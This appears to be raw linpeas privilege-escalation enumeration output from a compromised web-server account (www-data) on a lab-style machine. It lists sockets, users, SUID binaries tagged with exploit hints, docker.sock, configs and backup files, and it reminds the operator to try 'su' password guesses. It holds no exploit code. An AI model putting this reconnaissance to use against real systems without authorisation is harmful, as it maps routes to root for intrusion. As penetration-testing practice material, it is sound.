/containerd-shim/moby/1da62c6e70c5a40a858b19534075c74726626c9f35195ac26923b1cde4ebd826/shim.sock
/containerd-shim/moby/df43dc369c140d1c4cb8ca1bfb71f6dd7092d8fc32fff32fa2fe0b969876ffd1/shim.sock
/containerd-shim/moby/ef64b5e754cddbc138fda284da0108f513a116a4ccfc32016a376a2328dc5527/shim.sock
/run/acpid.socket
└─(Read Write)
/run/dbus/system_bus_socket
└─(Read Write)
/run/docker.sock
/run/docker/libnetwork/c3dd9ded04861ee6a17545b0ab85c32b36668f37676d36400b758f0c57ab7c9c.sock
/run/php/php7.2-fpm.sock
└─(Read Write)
/run/rpcbind.sock
└─(Read Write)
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/shutdownd
/run/udev/control
/var/run/dbus/system_bus_socket
└─(Read Write)
/var/run/docker.sock
/var/run/docker/containerd/docker-containerd-debug.sock
/var/run/docker/containerd/docker-containerd.sock
/var/run/docker/metrics.sock
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION CONNECTION-NAME
:1.0 1 systemd root :1.0 - - -
:1.1 438 systemd-logind root :1.1 systemd-logind.service - -
:1.12 7208 busctl www-data :1.12 php7.2-fpm.service - -
com.ubuntu.SoftwareProperties - - - (activatable) - -
org.freedesktop.DBus - - - - - - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 438 systemd-logind root :1.1 systemd-logind.service - -
org.freedesktop.machine1 - - - (activatable) - -
org.freedesktop.systemd1 1 systemd root :1.0 - - -
org.freedesktop.timedate1 - - - (activatable) - -
╔═════════════════════╗
════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
Durius
127.0.0.1 localhost
127.0.1.1 Durius
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
domain eu-west-1.compute.internal
search eu-west-1.compute.internal
nameserver 10.0.0.2
╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
br-d93f1fb84d0b Link encap:Ethernet HWaddr 02:42:e7:7b:e5:6b
inet addr:192.168.150.1 Bcast:192.168.150.255 Mask:255.255.255.0
inet6 addr: fe80::42:e7ff:fe7b:e56b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2164 errors:0 dropped:0 overruns:0 frame:0
TX packets:2192 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3411925 (3.2 MiB) TX bytes:2714034 (2.5 MiB)
docker0 Link encap:Ethernet HWaddr 02:42:7b:32:77:19
inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
eth0 Link encap:Ethernet HWaddr 02:87:43:db:9b:ed
inet addr:10.10.214.203 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::87:43ff:fedb:9bed/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:3356 errors:0 dropped:0 overruns:0 frame:0
TX packets:3044 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2064834 (1.9 MiB) TX bytes:3518324 (3.3 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
veth0e49797 Link encap:Ethernet HWaddr ba:6f:3d:b1:d7:c2
inet6 addr: fe80::b86f:3dff:feb1:d7c2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2179 errors:0 dropped:0 overruns:0 frame:0
TX packets:2224 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3443395 (3.2 MiB) TX bytes:2716801 (2.5 MiB)
veth42f1130 Link encap:Ethernet HWaddr 3a:ce:5b:9b:68:b6
inet6 addr: fe80::38ce:5bff:fe9b:68b6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:26 errors:0 dropped:0 overruns:0 frame:0
TX packets:37 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2217 (2.1 KiB) TX bytes:2592 (2.5 KiB)
veth6cd6483 Link encap:Ethernet HWaddr 4a:50:db:ac:c6:49
inet6 addr: fe80::4850:dbff:feac:c649/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:996 (996.0 B) TX bytes:1030 (1.0 KiB)
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 731/nginx: worker p
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:35458 0.0.0.0:* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::60060 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
benclower:x:1001:1001:Ben Clower,,,:/home/benclower:/bin/bash
me:x:1000:1000:me,,,:/home/me:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=103(systemd-timesync) groups=103(systemd-timesync)
uid=1000(me) gid=1000(me) groups=1000(me),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
uid=1001(benclower) gid=1001(bendover) groups=1001(bendover)
uid=101(systemd-network) gid=104(systemd-network) groups=104(systemd-network)
uid=102(systemd-resolve) gid=105(systemd-resolve) groups=105(systemd-resolve)
uid=103(systemd-bus-proxy) gid=106(systemd-bus-proxy) groups=106(systemd-bus-proxy)
uid=104(Debian-exim) gid=109(Debian-exim) groups=109(Debian-exim)
uid=105(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(messagebus) gid=112(messagebus) groups=112(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
╔══════════╣ Login now
18:17:12 up 20 min, 0 users, load average: 0.39, 0.12, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
reboot system boot Wed Apr 22 06:31:00 2020 - Wed Apr 22 06:39:48 2020 (00:08) 0.0.0.0
root tty1 Fri Apr 17 09:52:30 2020 - down (00:11) 0.0.0.0
reboot system boot Fri Apr 17 09:51:59 2020 - Fri Apr 17 10:03:44 2020 (00:11) 0.0.0.0
root tty1 Fri Apr 17 09:51:27 2020 - down (00:00) 0.0.0.0
reboot system boot Fri Apr 17 09:50:45 2020 - Fri Apr 17 09:51:49 2020 (00:01) 0.0.0.0
me pts/0 Fri Apr 17 09:19:36 2020 - down (00:30) 192.168.225.1
root tty1 Fri Apr 17 09:18:53 2020 - down (00:31) 0.0.0.0
reboot system boot Fri Apr 17 09:18:36 2020 - Fri Apr 17 09:50:33 2020 (00:31) 0.0.0.0
wtmp begins Fri Apr 17 09:18:36 2020
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Thu Apr 23 15:44:19 -0500 2020
me pts/0 192.168.66.1 Thu Apr 23 15:46:36 -0500 2020
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/docker
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/wget
╔══════════╣ Installed Compilers
/usr/share/gcc-4.9
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.10 (Debian)
Server built: Sep 30 2019 19:32:08
httpd Not Found
Nginx version:
./linpeas.sh: 2593: ./linpeas.sh: grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null: not found
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Apr 22 2020 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Apr 22 2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Apr 22 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
drwxr-xr-x 2 root root 4096 Apr 22 2020 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Apr 22 2020 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Apr 17 2020 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
listen 80;
location / {
proxy_no_cache 1;
proxy_cache_bypass 1;
add_header Last-Modified $date_gmt;
add_header Cache-Control 'no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0';
if_modified_since off;
expires off;
etag off;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Real-IP $remote_addr;
proxy_pass http://192.168.150.10:80;
}
}
lrwxrwxrwx 1 root root 33 Apr 22 2020 /etc/nginx/sites-enabled/newcms -> /etc/nginx/sites-available/newcms
server {
listen 192.168.150.1:80;
server_name newcms.mofo.pwn;
root /var/www/html/;
index index.php index.html index.htm;
client_max_body_size 100M;
autoindex off;
location / {
try_files $uri $uri/ @handler;
}
location /admin {
try_files $uri $uri/ /admin/index.php?$args;
}
location @handler {
if (!-e $request_filename) { rewrite / /index.php last; }
rewrite ^(.*.php)/ $1 last;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
}
-rw-r--r-- 1 root root 1332 Sep 30 2019 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Apr 22 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 71817 Apr 19 2020 /etc/php/7.2/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71429 Apr 19 2020 /etc/php/7.2/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 71819 Apr 22 2020 /etc/php/7.2/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
ibase.allow_persistent = 1
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 964 Jul 12 2017 /etc/nginx/fastcgi_params
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Dec 10 2017 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Apr 17 2020 /etc/ldap
╔══════════╣ Searching ssl/ssh files
Port 22
PermitRootLogin without-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
gpg-connect-agent: can't connect to the agent: IPC connect call failed
══╣ Some home ssh config file was found
/usr/share/doc/openssh-client/examples/sshd_config
AuthorizedKeysFile .ssh/authorized_keys
UsePrivilegeSeparation sandbox # Default for new installations.
Subsystem sftp /usr/libexec/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr 17 2020 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar 25 2019 /etc/pam.d/sshd
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr 17 2020 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
gpg Not Found
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 4545 Apr 22 2020 /etc/apt/trusted.gpg
-rw-r--r-- 1 root root 5138 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
-rw-r--r-- 1 root root 5147 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
-rw-r--r-- 1 root root 2775 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
-rw-r--r-- 1 root root 7483 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
-rw-r--r-- 1 root root 7492 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
-rw-r--r-- 1 root root 2275 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
-rw-r--r-- 1 root root 3780 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg
-rw-r--r-- 1 root root 2851 Jun 18 2017 /etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg
-rw-r--r-- 1 root root 364 Apr 22 2020 /etc/apt/trusted.gpg.d/ondrej-php.gpg
-rw-r--r-- 1 root root 36941 Jun 18 2017 /usr/share/keyrings/debian-archive-keyring.gpg
-rw-r--r-- 1 root root 17538 Jun 18 2017 /usr/share/keyrings/debian-archive-removed-keys.gpg
-rw-r--r-- 1 root root 1652 Jul 6 2019 /var/lib/apt/lists/ftp.no.debian.org_debian_dists_jessie_Release.gpg
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEEEmwNJL2KKULMffisdjjQRCuQ0BAFAl0ga7cACgkQdjjQRCuQ
0BA6SQ//XcX8Ht+5nd5TQi468rLb26Gn5VD2iZOcnQmZksR7ny06o0Q+CHoQQqvW
fdRnhH5zVdj1ivcnhQ8ihgCNQILWFcgUgKSlbcSdYvzlJnj6adVboXLkm+Sslght
B/oEI8DLuMA8EhENbyjJ2/0vcTwuj4xaZAAO/Tri+NX55+xt7SbV8u4rfGPgOLlq
7Y54kldHLHM+cFVLTVA2IwfjaNGwoOWkenygH1vroxBiUf0h1CaLDNq4yPo4TSDK
Z24Eb8NWAyjnNdrQ9J0D2qJXXhjfnVXkeUeAIr+LAcmECAo4EnNrDQYt1jsL5An7
VWdTQw6E21jWzgMAqB6IqjsG1R/rlqoE8YtDnl2XiQdvJrhxQ/AR5zLh8fPuirea
2pgsH65DSTTob6Ie6tdWmDTEarRHSMu87a9oaNdBDLecESbXtRqG8ULtI/O3Ygxi
UrjdAsk+eQ0vfCDcWOL4l83yFVIFY/lwmeySriN1rrCFuyl+1QrGtPyFst3zoN0q
nyTdO6MdHU909fKozfYvEoke9G0DCI1N0xiqupO7Csm4yMaUPIdqpe5H67AggD4d
dqY76jk9coCNsAqy5zoi1xSoXDaTl8XjQlmVj7Tx+f2hNTw+16dm0j8Mppt49gw7
Qp8yEkO/nz5+iefSeZpMd4wYmwek3/C0hN4cBfETKVB+63rfAcs=
=37TE
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAABAgAGBQJdIG1VAAoJEMv41v1RjhfhpkEQAJH/1MMBBRqroekA3xcegY3n
DHTcTWzDD1ioYhVGBp7tu1y1fLkGUcHOUxb05py4oTN16QsNBNzHJRrw6YMYqEB3
dOsJ3tkgnXb4+Jd7r95Pt1o6pso8w4yHICpTUTCCwrkSNUxdFeeuuqGDONl36XK/
saGc/AzfuN0d/xhYzAode7wCc/iBhffZ01JZiwXD+DBuvZCVYn1HHdU78iCOcAgd
DG65m0Y1iQGdDXUuvSkznGFxpMmPhOjHod9+9ZdUx0BbdAX6PblHGtHSgAUQkAEd
5wMERA8X1w2j8nUivAYQ/IzI6lhlfl7c0sg0rF8z6mwxyiEL2gRzNgLnwekn7PEk
Ef+lMnVFIzMnSZUgBhvSgP2V5WNLPavPxtaXxlBchbfEDqNOHBu3qeezVsK+ne4B
BZTlbO9XzMveQjRWNADb8rzzF8QIYcjP1v2JPB/gJIK7HPRAzKs/tvyDXUe8hYdA
Sjs1BKk73/W6DlrOCJRwl/+NvoaN/pfDjf6T/ftI1P2eZuDDH6BOX6HhPHd+Puvb
tkasi14UCs7gjJu9PI5bM5tGUIeykuUQHuHoscIo0HKkgSaurihNuLB89jbMb9uX
EvkrLDeZxgxfbc/sHfbBqKzXK+GatEB+qA3OQKm0np4G1DI3Jr++g0jttaAgwzE7
9njHtrdklIBMMG34aHKf
=KdZN
-----END PGP SIGNATURE-----
╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
lrwxrwxrwx 1 root root 33 Apr 17 2020 /etc/systemd/system/sockets.target.wants/docker.socket -> /lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 0 Apr 17 2020 /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Apr 19 2020 /etc/php/7.2/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Apr 19 2020 /usr/share/php7.2-common/common/ftp.ini
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r----- 1 www-data adm 721376 Jan 26 18:14 /var/log/nginx/access.log
-rw-r----- 1 www-data adm 16106 Jan 26 18:14 /var/log/nginx/error.log
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3515 Nov 5 2016 /etc/skel/.bashrc
-rw-r--r-- 1 root root 675 Nov 5 2016 /etc/skel/.profile
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-- 1 root messagebus 292K Jun 14 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9.9K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 455K Mar 25 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 1012K Sep 5 2019 /usr/sbin/exim4
-rwsr-xr-x 1 root root 53K May 17 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 74K May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53K May 17 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-sr-x 1 daemon daemon 55K Sep 30 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-sr-x 1 root mail 88K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 44K May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 39K May 17 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 89K Oct 19 2019 /sbin/mount.nfs
-rwsr-xr-x 1 root root 27K Mar 29 2015 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 40K May 17 2017 /bin/su
-rwsr-xr-x 1 root root 40K Mar 29 2015 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 61K May 17 2017 /usr/bin/chage
-rwxr-sr-x 1 root ssh 339K Mar 25 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mail 11K Aug 1 2018 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root mail 19K Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root mlocate 35K Jun 13 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 15K Oct 17 2014 /usr/bin/bsd-write
-rwsr-sr-x 1 daemon daemon 55K Sep 30 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-sr-x 1 root mail 88K Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root shadow 23K May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root mail 15K Jun 2 2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 27K Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root crontab 36K Mar 21 2019 /usr/bin/crontab
-rwxr-sr-x 1 root adm 88K Dec 12 2012 /usr/bin/ispell
-rwxr-sr-x 1 root shadow 35K May 27 2017 /sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
Files with capabilities (limited to 50):
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/bin/ping6 = cap_net_raw+ep
/bin/ping = cap_net_raw+ep
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
╔══════════╣ Unexpected in root
/vmlinuz
/initrd.img
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2020 .
drwxr-xr-x 90 root root 4096 Jan 26 17:57 ..
-rw-r--r-- 1 root root 663 Mar 22 2014 bash_completion.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/run/php
/var/www/html/inc/data
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/kern.log
/var/log/auth.log
/var/log/messages
/var/log/daemon.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/syslog
/var/www/html/tmp/blog.html
╔══════════╣ Writable log files (logrotten) (limit 100)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
╔══════════╣ Files inside /var/www (limit 20)
total 12
drwxr-xr-x 3 root root 4096 Apr 17 2020 .
drwxr-xr-x 12 root root 4096 Apr 23 2020 ..
drwxr-xr-x 8 www-data www-data 4096 Apr 22 2020 html
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
exim
sendmail
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup folders
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 39824 Apr 17 2020 /etc/nginx/backup.sql
-rw-r--r-- 1 root root 875 Apr 17 2020 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Apr 17 2020 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 339 Apr 17 2020 /etc/xml/docutils-common.xml.old
-rw-r--r-- 1 root root 7824 May 8 2018 /lib/modules/3.16.0-6-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 10703 Apr 17 2020 /usr/share/info/dir.old
-rw-r--r-- 1 root root 12741 Feb 10 2018 /usr/share/doc/exim4-base/changelog.Debian.old.gz
-rw-r--r-- 1 root root 7867 Jul 22 2008 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 2862 Aug 1 2018 /usr/share/doc/mutt/NEWS.old.gz
-rw-r--r-- 1 root root 159 Apr 17 2020 /var/lib/sgml-base/supercatalog.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/apt/listchanges.db: Berkeley DB (Hash, version 9, native byte-order)
Found /var/lib/mlocate/mlocate.db: regular file, no read permission
